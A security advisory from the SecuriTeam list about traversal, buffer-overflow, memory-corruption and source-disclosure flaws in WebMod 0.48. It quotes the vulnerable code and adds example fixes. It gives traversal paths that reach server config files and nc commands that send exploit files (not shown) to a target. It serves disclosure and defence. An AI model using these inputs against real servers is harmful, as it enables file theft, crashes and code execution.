[NEWS] WebMod Multiple Vulnerabilities



The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com



WebMod Multiple Vulnerabilities
------------------------------------------------------------------------


SUMMARY

<http://www.djeyl.net/w.php> WebMod is "an open source MetaMod plugin
which acts as a web server for Half-Life running on the equivalent TCP
port of the UDP one used by the game". Multiple vulnerabilities have been
discovered in WebMod; they allow remote attackers to crash the server and
to execute arbitrary code on it.

DETAILS

Vulnerable Systems:
* WebMod version 0.48

Directory traversal
WebMod's anti-directory-traversal check searches only for the "../"
pattern in the client's HTTP request. A "..\" pattern therefore bypasses
the check and allows any file on the disk where Half-Life is running to be
downloaded, including the configuration files of the game server (for
example ..\..\..\..\platform\config\server.vdf or .\..\..\server.cfg).
Note that this bug works only on Windows servers, where the backslash is
a path separator.

From server.cpp:
void clientHandle(int connfd, httpquery_t *query, int tid)
...
    if(strstr(str,"../")) // hack attempt, display index page
    {
        str[0]='\0';
    }

Cookie buffer-overflow
A cookie parameter longer than MYSOCK_BUFLEN (8192) bytes leads to a stack
based buffer-overflow.

From server.cpp:
void connectHandle(void *data)
{
    char *input;
    char buf[MYSOCK_BUFLEN+1];
    ...
    for(j=0;input[i]&&input[i]!=';'&&input[i]!='\n';j++,i++)
        buf[j]=input[i];    // j is never checked against MYSOCK_BUFLEN

parser.cpp arbitrary memory writing
The functions in parser.cpp are affected by several memory corruption
vulnerabilities whose effects depend on the type of variable/script used.
In short, a value longer than MAX_FILE_SIZE (16384) bytes can lead to the
writing of attacker-controlled data at an attacker-controlled memory
address through strcat (auth.w?mode), to a NULL pointer dereference
(auth.w?redir), to an invalid memory access (the rconpass parameter of
auth.w), and so on.
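A bounded version of the cookie-copy loop, added here as an example and not WebMod's code. It keeps the original loop's terminators (';' and '\n') but refuses values that do not fit, which is also the shape of fix the unchecked strcat calls on MAX_FILE_SIZE buffers in parser.cpp need. The constant MYSOCK_BUFLEN is taken from the advisory; the helper names are assumptions.

```c
#include <stddef.h>
#include <string.h>

#define MYSOCK_BUFLEN 8192      /* the buffer size WebMod's server.cpp uses */

/* Bounded cookie copy (example code, not WebMod's). Copies one cookie value
 * (up to ';' or '\n') from input into buf, like the original loop, but stops
 * before buf is exhausted. Returns the number of bytes copied, or -1 when
 * the value does not fit, so the caller can reject the request instead of
 * overrunning the stack. The same length-check-before-every-write pattern
 * (or strncat with the remaining space) fixes the strcat uses in parser.cpp. */
static int copy_cookie_value(const char *input, char *buf, size_t buflen)
{
    size_t i, j = 0;

    for (i = 0; input[i] && input[i] != ';' && input[i] != '\n'; i++) {
        if (j >= buflen - 1)            /* keep one byte for the NUL */
            return -1;
        buf[j++] = input[i];
    }
    buf[j] = '\0';
    return (int)j;
}

/* Buffer of the same size WebMod uses; static so callers can inspect it. */
static char cookie_buf[MYSOCK_BUFLEN + 1];

static int try_cookie(const char *input)
{
    return copy_cookie_value(input, cookie_buf, sizeof cookie_buf);
}

/* Constructed input: a cookie value 100 bytes longer than the buffer.
 * Returns 1 when the copy is refused, as it must be. */
static int oversized_cookie_rejected(void)
{
    static char cookie[MYSOCK_BUFLEN + 100 + 1];
    memset(cookie, 'A', sizeof cookie - 1);
    cookie[sizeof cookie - 1] = '\0';
    return try_cookie(cookie) == -1;
}
```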

Scripts source disclosure
Adding a dot at the end of the requested URI returns the script's source
code instead of executing it. This bug (which should work only on FAT/NTFS
filesystems) can be considered a security vulnerability ONLY if the server
runs custom scripts.
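A hardened request-path check covering both the "..\" traversal bypass and the trailing-dot source disclosure, added here as an example and not WebMod's code. The original strstr check is reproduced for comparison; path_is_confined and its rule set are assumptions, and it must be run on the URL-decoded path.

```c
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* The check WebMod 0.48 applies (reproduced for comparison): only the
 * forward-slash form of a parent-directory reference is caught, so on
 * Windows "..\" walks out of the web root unnoticed. */
static bool webmod_original_check(const char *str)
{
    return strstr(str, "../") == NULL;      /* true = request is served */
}

/* Hardened check (example code, not WebMod's). A path is confined to the
 * web root only if it is relative, has no drive letter or NTFS stream (':'),
 * and no segment, split on either '/' or '\', is ".." or ends in '.' or ' '
 * (Windows silently drops trailing dots and spaces, which is what makes
 * "auth.w." open auth.w and disclose its source). */
static bool path_is_confined(const char *path)
{
    const char *p = path;

    if (*p == '/' || *p == '\\' || strchr(p, ':') != NULL)
        return false;                       /* absolute path or drive letter */

    while (*p) {
        const char *end = p;
        while (*end && *end != '/' && *end != '\\')
            end++;                          /* end of the current segment */
        size_t len = (size_t)(end - p);

        if (len == 2 && p[0] == '.' && p[1] == '.')
            return false;                   /* parent reference, any separator */
        if (len >= 2 && (end[-1] == '.' || end[-1] == ' '))
            return false;                   /* "auth.w." style trailing dot/space */

        p = *end ? end + 1 : end;
    }
    return true;
}
```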

Exploits:
webmodz1.txt:
nc SERVER PORT -v -v < webmodz1.txt

webmodz2.txt
nc SERVER PORT -v -v < webmodz2.txt

webmodz3.txt

nc SERVER PORT -v -v < webmodz3.txt

webmodz4.txt

nc SERVER PORT -v -v < webmodz4.txt


ADDITIONAL INFORMATION

The information has been provided by <mailto:aluigi@xxxxxxxxxxxxx> Luigi
Auriemma.
The original article can be found at:
<http://aluigi.altervista.org/adv/webmodz-adv.txt>



